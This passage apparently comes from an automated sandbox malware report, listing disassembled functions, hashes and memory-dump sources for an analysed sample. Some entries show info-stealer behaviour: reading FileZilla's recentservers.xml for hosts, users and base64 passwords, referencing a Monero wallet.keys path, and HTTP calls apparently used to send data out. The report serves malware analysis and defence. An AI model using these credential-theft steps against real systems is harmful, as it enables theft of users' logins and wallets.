                                      • Instruction ID: 063be61567c3cc34b3fe076e879410dc2d5673c3f197b54bb573a2bfe42ea6ce
                                      • Opcode Fuzzy Hash: f89725055675f9fe0d890c9304dd57e03d8cc8cb63783e711a6723cab36c8961
                                      • Instruction Fuzzy Hash: 4A5127F3A082045FF3486E29DC8977AB7D6EBD4310F1B823CDB8553780E93A69058696
                                      Function 00DD82FC Relevance: .2, Instructions: 186COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2c903c2a3e8e848a76500c946892ecdc3bd179526307d79aaaba1823fb77b0cd
                                      • Instruction ID: 28ebad7ebb6702d243aff7153e2daf194dca3caa566e5efd2aae4f63f6fb3934
                                      • Opcode Fuzzy Hash: 2c903c2a3e8e848a76500c946892ecdc3bd179526307d79aaaba1823fb77b0cd
                                      • Instruction Fuzzy Hash: 0F514BF3B183245FE314692DEC8977BB7C9DB94720F16863EEA8893740E9745C0582D2
                                      Function 00D8C963 Relevance: .2, Instructions: 169COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8f15fa1d9d189ade67ce8e0481b6a8aee307ad48fa129fe6605bfc33ff10be07
                                      • Instruction ID: ee5de38f55bc8ac7ebcd32d9db758517a78607f21b72627c64ff29135675b9fe
                                      • Opcode Fuzzy Hash: 8f15fa1d9d189ade67ce8e0481b6a8aee307ad48fa129fe6605bfc33ff10be07
                                      • Instruction Fuzzy Hash: 7E5109F3A092049BE3009A2DDC9076AB7D6EBD4721F2AC53DE6C483384EE3899054656
                                      Function 00E0E100 Relevance: .2, Instructions: 155COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d767764ff2f33ce6e1e8f765c7a956c4d27308a03143260efbd5616bceee4804
                                      • Instruction ID: 09c06198018add28155c09fd0ba5fcb5268d4be27d8db1f43efddde8ac1f8c9b
                                      • Opcode Fuzzy Hash: d767764ff2f33ce6e1e8f765c7a956c4d27308a03143260efbd5616bceee4804
                                      • Instruction Fuzzy Hash: C6416BF3A042044BE7146E3DDD9973ABB9ADBE0720F1A463D9BC487384E979281A8241
                                      Function 00AA6799 Relevance: .1, Instructions: 131COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction ID: 5aa0adb7f762fe3d06e09f449e880f812fa8f53ade7ffffaf2b1a348cf8b9f0b
                                      • Opcode Fuzzy Hash: 2a8b669df8d736d86e52b1f6831f1fee8e67c9cfb658995c3eff484ea6ea57f1
                                      • Instruction Fuzzy Hash: DB511962E09BD585C7058B7944502EEBFB25FE6210F1E829EC4981B3C3C3759689D3E5
                                      Function 00F14C7F Relevance: .1, Instructions: 87COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: e253e57ca7356c224ca0d41709c8b39e882e7e6d9169816814ccce38d8b28744
                                      • Instruction ID: 01774b399433d088ab4463d279d9c9e44650e84ad8465a276c20081bcb8c1658
                                      • Opcode Fuzzy Hash: e253e57ca7356c224ca0d41709c8b39e882e7e6d9169816814ccce38d8b28744
                                      • Instruction Fuzzy Hash: 2521B1B390C6149FE701BE69DC806AAFBE5EF88360F16892DE6C493600D6355841CAD3
                                      Function 00A775A8 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction ID: 6f3579539133c16e82723237803b8971b03cd8b531f9f429ebb9f832563e04b3
                                      • Opcode Fuzzy Hash: dffa8fe14fb17786e60520bf3c8c8ace1f347de8b7b0a65a7913e683934b358a
                                      • Instruction Fuzzy Hash: 27D0C971A097118FC3688F1EF440546FAE8EBD8320715C53FA09EC3750C6B494418B54
                                      Function 00A49AA0 Relevance: .0, Instructions: 15COMMON
                                      Download Yara Rule
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                                      • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                                      • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                                      Function 00A403B0 Relevance: 68.6, APIs: 29, Strings: 10, Instructions: 366stringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                        • Part of subcall function 00A48F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A48F9B
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A3A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A3A13C
                                        • Part of subcall function 00A3A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A3A161
                                        • Part of subcall function 00A3A110: LocalAlloc.KERNEL32(00000040,?), ref: 00A3A181
                                        • Part of subcall function 00A3A110: ReadFile.KERNEL32(000000FF,?,00000000,00A3148F,00000000), ref: 00A3A1AA
                                        • Part of subcall function 00A3A110: LocalFree.KERNEL32(00A3148F), ref: 00A3A1E0
                                        • Part of subcall function 00A3A110: CloseHandle.KERNEL32(000000FF), ref: 00A3A1EA
                                        • Part of subcall function 00A48FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A48FE2
                                      • GetProcessHeap.KERNEL32(00000000,000F423F,00A50DBF,00A50DBE,00A50DBB,00A50DBA), ref: 00A404C2
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A404C9
                                      • StrStrA.SHLWAPI(00000000,<Host>), ref: 00A404E5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A404F3
                                      • StrStrA.SHLWAPI(00000000,<Port>), ref: 00A4052F
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A4053D
                                      • StrStrA.SHLWAPI(00000000,<User>), ref: 00A40579
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A40587
                                      • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00A405C3
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A405D5
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A40662
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A4067A
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A40692
                                      • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A406AA
                                      • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00A406C2
                                      • lstrcat.KERNEL32(?,profile: null), ref: 00A406D1
                                      • lstrcat.KERNEL32(?,url: ), ref: 00A406E0
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A406F3
                                      • lstrcat.KERNEL32(?,00A51770), ref: 00A40702
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A40715
                                      • lstrcat.KERNEL32(?,00A51774), ref: 00A40724
                                      • lstrcat.KERNEL32(?,login: ), ref: 00A40733
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A40746
                                      • lstrcat.KERNEL32(?,00A51780), ref: 00A40755
                                      • lstrcat.KERNEL32(?,password: ), ref: 00A40764
                                      • lstrcat.KERNEL32(?,00000000), ref: 00A40777
                                      • lstrcat.KERNEL32(?,00A51790), ref: 00A40786
                                      • lstrcat.KERNEL32(?,00A51794), ref: 00A40795
                                      • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00A50DB7), ref: 00A407EE
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283145861.0000000000FC7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283288408.000000000116B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1283307586.000000000116C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_a30000_file.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                                      • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                      • API String ID: 1942843190-555421843
                                      • Opcode ID: 6ac101b8db49329aeddb2b060b72beed7102c8b00c0ebc26fa5d84217071aab3
                                      • Instruction ID: 0274671ec3badb0db4d2d76668fb951070eb0789d9537d63f0279c024ed6ee04
                                      • Opcode Fuzzy Hash: 6ac101b8db49329aeddb2b060b72beed7102c8b00c0ebc26fa5d84217071aab3
                                      • Instruction Fuzzy Hash: DBD13076D40208ABDB04EBF4DE56EEE7739FFA4301F408554F506A6191DE34AA09CB71
                                      Function 00A359B0 Relevance: 39.0, APIs: 17, Strings: 5, Instructions: 495networkstringmemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00A4AAB0: lstrcpy.KERNEL32(?,00000000), ref: 00A4AAF6
                                        • Part of subcall function 00A34800: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00A34889
                                        • Part of subcall function 00A34800: InternetCrackUrlA.WININET(00000000,00000000), ref: 00A34899
                                        • Part of subcall function 00A4AA50: lstrcpy.KERNEL32(00A50E1A,00000000), ref: 00A4AA98
                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00A35A48
                                      • StrCmpCA.SHLWAPI(?,0131F410), ref: 00A35A63
                                      • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A35BE3
                                      • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0131F4F0,00000000,?,0131E2E8,00000000,?,00A51B4C), ref: 00A35EC1
                                      • lstrlen.KERNEL32(00000000), ref: 00A35ED2
                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00A35EE3
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 00A35EEA
                                      • lstrlen.KERNEL32(00000000), ref: 00A35EFF
                                      • lstrlen.KERNEL32(00000000), ref: 00A35F28
                                      • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00A35F41
                                      • lstrlen.KERNEL32(00000000,?,?), ref: 00A35F6B
                                      • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00A35F7F
                                      • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00A35F9C
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36000
                                      • InternetCloseHandle.WININET(00000000), ref: 00A3600D
                                      • HttpOpenRequestA.WININET(00000000,0131F4E0,?,0131EE20,00000000,00000000,00400100,00000000), ref: 00A35C48
                                        • Part of subcall function 00A4ACC0: lstrlen.KERNEL32(?,013189C8,?,\Monero\wallet.keys,00A50E1A), ref: 00A4ACD5
                                        • Part of subcall function 00A4ACC0: lstrcpy.KERNEL32(00000000), ref: 00A4AD14
                                        • Part of subcall function 00A4ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00A4AD22
                                        • Part of subcall function 00A4ABB0: lstrcpy.KERNEL32(?,00A50E1A), ref: 00A4AC15
                                        • Part of subcall function 00A4AC30: lstrcpy.KERNEL32(00000000,?), ref: 00A4AC82
                                        • Part of subcall function 00A4AC30: lstrcat.KERNEL32(00000000), ref: 00A4AC92
                                      • InternetCloseHandle.WININET(00000000), ref: 00A36017
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1282579993.0000000000A31000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A30000, based on PE: true
                                      • Associated: 00000000.00000002.1282564732.0000000000A30000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000A5C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B79000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000B9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282579993.0000000000D06000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000D1A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000EAB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000F89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB0000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.1282834680.0000000000FC6000.00000040.00000001.01000000.00000003.sdmpDownload File
